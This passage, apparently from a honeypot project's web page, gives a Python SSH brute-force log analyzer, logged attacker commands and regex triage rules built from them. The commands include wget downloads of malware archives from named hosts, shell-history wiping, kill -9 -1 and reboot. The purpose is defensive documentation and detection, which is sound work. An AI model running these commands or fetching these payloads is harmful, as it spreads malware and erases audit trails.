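Jul  7 19:20:05 host sshd[2105]: Failed password for root from 203.0.113.7 port 40131 ssh2
Jul  7 19:20:09 host sshd[2109]: Failed password for guest from 203.0.113.7 port 40140 ssh2
Jul  7 19:20:12 host sshd[2112]: Accepted password for guest from 203.0.113.7 port 40152 ssh2
Jul  7 19:25:40 host sshd[2190]: Failed password for invalid user a from 10.0.0.1 from 198.51.100.9 port 51000 ssh2
Jul  7 20:02:17 host sshd[2244]: Accepted password for maria from 192.0.2.44 port 50211 ssh2
"""

# The user name is attacker-controlled and may itself contain " from <ip>".
# The greedy (.*) anchored at the line end keeps the last, real source address.
FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(.*) from (\S+) port \d+ ssh2$")
ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted password for (.*) from (\S+) port \d+ ssh2$")

def analyze(log_text, min_failures=3):
    """Return (attempts per user name, logins accepted after >= min_failures)."""
    users = Counter()
    failures = defaultdict(int)          # failed attempts per source IP
    suspicious = []
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            users[m.group(1)] += 1
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED.search(line)
        if m and failures[m.group(2)] >= min_failures:
            suspicious.append((m.group(1), m.group(2), failures[m.group(2)]))
    return users, suspicious

if __name__ == "__main__":
    users, suspicious = analyze(SAMPLE_LOG)
    for name, count in users.most_common():
        print(f"{count:5d}  {name}")
    for user, ip, n in suspicious:
        print(f"ALERT: {user} accepted from {ip} after {n} failed attempts")
```

An accepted login from an address that was guessing passwords moments earlier is the signal worth alerting on; the login for `maria` in the sample has no prior failures and is not flagged.
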
Some flashy detections:
Telnet scans from 128.59.14.100 - 128.59.14.116 (Columbia University) which happened to be a false positive. Read about their project. Nevertheless, after a re-visit in Sep. 2011, we found a number of things that we dislike:
They don't say when it will come to an end, it is always an "ongoing" project. I guess that knocking on others' doors should last as briefly as possible. Since they have moved to SSH probing, what's next?
They are making money out of it: a company, several patents, sponsored by several military offices, conferences, publications... Therefore, output about the results is scarce. If nobody else is going to take advantage of the investigations, it does not make much difference compared to other daily scans.
Fake results in Gnutella network from 65.50.67.197 (www.markmonitor.com) in March 2010... when looking for public domain files!
Port scan from 69.48.241.84 (www.trustedsource.org, owned by McAfee Antivirus) on December 21st 2009.
Sharing fake files in Gnutella network from 65.55.102.24 (Microsoft Corporation), October 21st and November 1st of 2009.
Port scan from 208.43.71.139 (Avast Antivirus) in September and October of 2009.
Assorted SSH attacks
Gathering information

w
uptime
id
ls -a
uname -a
cat /proc/cpuifno
ps x
wget
curl -O

After a previous successful login

rm -rf .bash_history
history -c
w
ps x
ls -a

Attempting to get rid of the honeypot

bash
sh
kill -9 -1
reboot
exit

Sending malware to the target

uname -a
passwd
wget http://nasa.undernet.nm.ru/udp.tgz
tar zxvf udp.tgz
Other deliveries came from

dragutrau.clan.su/Trade/army.tar.gz
freewebtown.com/hotzu/py/ryo.tar
prigat.ucoz.com/mangalia.tgz

Attackers don't want us to see what they do

unset HISTFILE HISTSAVE HISTLOG WATCH
HISTFILE=/dev/null

Attempting to run malware

cd /dev/shm
su
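
The command groups listed above can be turned into triage rules for honeypot or shell-audit transcripts. This is an added example, not ATMA's own tooling: the rule labels, the `classify` and `triage` helpers and the sample session (constructed, with a placeholder URL) are assumptions.

```python
import re

# Rules derived from the command groups listed above. First match wins,
# so the specific patterns come before generic reconnaissance.
RULES = [
    ("hide-history", re.compile(
        r"^(unset\s+.*\bHIST\w*|HISTFILE=/dev/null|history\s+-c|rm\s+.*\.bash_history)")),
    ("kill-session", re.compile(r"^(kill\s+-9\s+-1|reboot)\b")),
    ("download",     re.compile(r"^(wget|curl)\b")),
    ("unpack",       re.compile(r"^tar\s+\S*x")),
    ("staging-dir",  re.compile(r"^cd\s+/dev/shm\b")),
    ("privilege",    re.compile(r"^(su|passwd)\b")),
    ("recon",        re.compile(r"^(w|uptime|id|uname|ps|ls|cat\s+/proc/\S+)\b")),
]

# Constructed session built from commands on this page; the URL is a placeholder.
SESSION = [
    "unset HISTFILE HISTSAVE HISTLOG WATCH",
    "w",
    "uname -a",
    "cat /proc/cpuifno",
    "cd /dev/shm",
    "wget http://example.invalid/udp.tgz",
    "tar zxvf udp.tgz",
    "rm -rf .bash_history; history -c",
]

def classify(command):
    """Return the label of the first rule matching one shell command."""
    cmd = command.strip()
    for label, pattern in RULES:
        if pattern.search(cmd):
            return label
    return "other"

def triage(session):
    """Label every command (splitting ;, && and || chains) and collect alerts."""
    labels = []
    for line in session:
        for part in re.split(r"\s*(?:;|&&|\|\|)\s*", line):
            if part:
                labels.append((part, classify(part)))
    seen = [label for _, label in labels]
    alerts = []
    if "hide-history" in seen:
        alerts.append("history tampering")
    if "download" in seen and "unpack" in seen[seen.index("download"):]:
        alerts.append("download then unpack")
    if "staging-dir" in seen:
        alerts.append("work in /dev/shm")
    return labels, alerts

if __name__ == "__main__":
    labels, alerts = triage(SESSION)
    for cmd, label in labels:
        print(f"{label:13s} {cmd}")
    print("alerts:", alerts)
```
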

Dumb DoS or speed test?

Get involved

1-Contribute

This project is nonprofit. If you feel that you could donate or you've got some hardware you don't need, please contact us.

2-Join us or share your information, findings, logs...

We are always glad to receive information about attackers, new threats etc. Also, we have developed some automatic tools that collect, select, classify and merge IPs from a variety of logs. If you think that some in your system could help us, please drop us a line. For now, we can directly use logs from several P2P programs, some models of routers, Linux logs and a handful of other stuff.

3-Special request for English speakers

English is not our first language. We would be very grateful if you let us know about typos, weird expressions, etc.

4-Run a honeypot

Straightforward to run, transparent, no installation, just "chmod +x" and you're done. Alternatively you can use our web forms or API. Please contact us for further info.